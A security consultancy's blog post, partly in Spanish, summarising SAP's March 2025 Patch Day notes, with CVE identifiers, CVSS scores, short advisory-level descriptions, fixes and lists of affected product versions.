FEDER
C/María Berdiales, 20, 4ª Vigo (Spain)
+34 886 113 106
info@inprosec.com
enEnglish
esEspañol

SAP Security Notes, March 2025

SAP Notes, SAP Security
No Comments

Inprosec through its services, such as the SAP Security Assessment, helps its customers to improve the security levels of their SAP systems.

Contents ocultar
1 March 2025 Notes
1.1 Summary and Highlights of the Month
1.2 Full details
1.3 Reference links

March 2025 Notes

Summary and Highlights of the Month

Este mes el número total de notas ha sido de 25, 4 más que en el periodo anterior. Este mes no ha habido HotNews, igual que en el periodo anterior. En cuanto al número de notas de criticidad alta, estas se han reducido en 1 con respecto al mes anterior, pasando de 6 a 5. Las notas medias y bajas no serán revisadas, por lo que daremos detalle de un total de 5 notas (todas las que tengan un CVSS de 7 o mayor).

Tenemos un total de 25 notas para todo el mes (22 nuevas y 3 actualizaciones de notas publicadas en meses anteriores).

Revisaremos en detalle un total de 5 notas, todas de criticidad alta:

  1. La nota más crítica del mes (CVSS 8,8) es una High, se trata de una nota relacionada con Cross-Site Scripting (XSS) vulnerability in SAP Commerce (Swagger UI)”.
  2. La siguiente en criticidad, con la misma valoracion que la primera (CVSS 8,8) se trata de una nota relacionada con Missing Authorization check in SAP NetWeaver (ABAP Class Builder)”.
  3. La siguiente en criticidad (CVSS 8,6) se trata de una nota relacionada con Multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud”.
  4. Este mes el tipo más predominante está relacionado con Missing Authorization check (8/25 en patch day).

En la gráfica podemos ver la clasificación de las notas de marzo, además de la evolución y clasificación de los últimos 5 meses anteriores (solo las notas del Sec. Tuesday / Patch Day – by SAP):

Full details

The complete detail of the most relevant notes is as follows:

  1. Cross-Site Scripting (XSS) vulnerability in SAP Commerce (Swagger UI) (3569602): Due to insufficient input validation, SAP Commerce (Swagger UI) allows an unauthenticated attacker to inject the malicious code from remote sources, which can be leveraged by an attacker to execute a cross-site scripting (XSS) attack. This could lead to a high impact on the confidentiality, integrity, and availability of data in SAP Commerce. It is important to note that other components of SAP Commerce are not affected and significant user interaction is required for this to materialize. Switching starter themes eliminates the risk of this attack by removing the explore feature of Swagger UI which was vulnerable to the DOM-based XSS attack. The vulnerable DOM element is no longer rendered on Swagger UI. There is a Work around. CVSS v3 Base Score 8,8/ 10 [CVE-2025-27434]
  2. Missing Authorization check in SAP NetWeaver (ABAP Class Builder) (3563927): Due to missing authorization check, SAP NetWeaver (ABAP Class Builder) allows an attacker to gain higher access levels than they should have, resulting in escalation of privileges. On successful exploitation, this could result in disclosure of highly sensitive information. It could also have a high impact on the integrity and availability of the application. By this correction functionality restricted to the ABAP Development, workbench is excluded from execution by transaction SA38. There isn’t a workaround CVSS v3 Base Score 8,8/ 10 [CVE-2025-26661
  3.  Multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud (3566851): SAP Commerce Cloud uses a version of Apache Tomcat that could be vulnerable to DOS (CVE-2024-38286) and unchecked error conditions (CVE-2024-52316). For these vulnerabilities, prerequisites must apply first, as elaborated in the CVEs. To fix this vulnerability you have to update Apache Tomcat to versions not vulnerable to these CVEs. CVSS v3 Base Score 8,6/ 10 [CVE-2024-38286
     
  4.  Update – Authentication bypass via authorization code injection in SAP Approuter (3567974):  The SAP Approuter Node.js package version v16.7.1 and before is vulnerable to Authentication bypass. When trading an authorization code an attacker can steal the session of the victim by injecting malicious payload causing High impact on confidentiality and integrity of the application. To fix the error, please upgrade to SAP Approuter node.js package to 16.7.2 or higher. This fix ensures that the url protocol in the login callback url is a valid one. CVSS v3 Base Score 8,1/ 10 [CVE-2025-24876
  5. Update – Missing Authorization check in SAP PDCE (3483344): Elements of PDCE does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. This allows an attacker to read sensitive information causing high impact on the confidentiality of the application. When this note is aplied, the affected functions have now been deactivated to restrict accesses. CVSS v3 Base Score 7,6/ 10 [CVE-2024-39592]

Reference links

Other references, from SAP and Onapsis (march):

SAP Security Patch Day – March 2025

SAP Patch Day: March 2025 – Onapsis

Resources affected

  • SAP NetWeaver (ABAP Class Builder), Versions – SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914
  • SAP Commerce Cloud, Version -HY-COM 2205, COM-CLOUD 2211
  • @sap/approuter, Version – 2.6.1 to 16.7.1
  • SAP PDCE, Version – S4CORE 102, 103, S4COREOP 104, 105, 106, 107, 108
  • SAP Business One (Service Layer), Version – B1_ON_HANA 10.0, SAP-M-BO 10.0
  • SAP NetWeaver Application Server ABAP (applications based on SAP GUI for HTML), Versions – KRNL64UC 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.89, KERNEL 7.93, KERNEL 9.14
  • SAP NetWeaver Application Server ABAP, Version – SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, SAP_BASIS 914
  • SAP Business Warehouse (Process Chains), Version – DW4CORE 100, DW4CORE 200, DW4CORE 300, DW4CORE 400, DW4CORE 914, SAP_BW 730, SAP_BW 731, SAP_BW 740, SAP_BW 750
  • SAP NetWeaver Application Server Java, Version – AJAX-RUNTIME 7.50
  • SAP NetWeaver Enterprise Portal (OBN component), Version – EP-RUNTIME 7.50
  • SAP Web Dispatcher and Internet Communication Manager, Versions – WEBDISP 7.53, WEBDISP 7.54, WEBDISP 7.77, WEBDISP 7.89, WEBDISP 7.93
  • SAP BusinessObjects Business Intelligence Platform, Version – ENTERPRISE 430, 2025, 2027 ENTERPRISECLIENTTOOLS 430, 2025
  • SAP S/4HANA (Manage Bank Statements), Versions – S4CORE 107, S4CORE 108
  • SAP S/4HANA (RBD), Versions – S4CORE 102, 103, 104, 105, 106, 107, 108, EA-FINSERV 618, EA-FINSERV 800
  • SAP Fiori apps (Posting Library), Version – S4CORE 103, 104, 105, 106, 107, 108
  • S/4HANA On-Premise, Version – S4CORE 105, 106, 107, 108
  • SAP Permit to Work, Versions – UIS4HOP1 800, 900
  • SAP Commerce Cloud and SAP Datahub, , Version -HY_COM 2205, HY_DHUB 2205, COM_CLOUD 2211, DHUB_CLOUD 2211
  • SAP CRM and SAP S/4HANA (Interaction Center), Versions – S4CRM 100, 200, 204, 205, 206, S4FND 102, 103, 104, 105, 106, 107, 108, S4CEXT 107, 108, BBPCRM 701, 702, 712, 713, 714, WEBCUIF 701, 731, 746, 747, 748, 800, 801
  • SAP Just In Time, Version – S4CORE 102, 103, 104, 105, 106, 107, ECC-DIMP 618
  • SAP Electronic Invoicing for Brazil (eDocument Cockpit), Version – SAP_APPL 617, 618, S4CORE 102, 103, 104, 105, 106, 107, 108

Did you like it?

Share it on social media!

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Categories

Calendar of posts

Our services

keyboard_arrow_up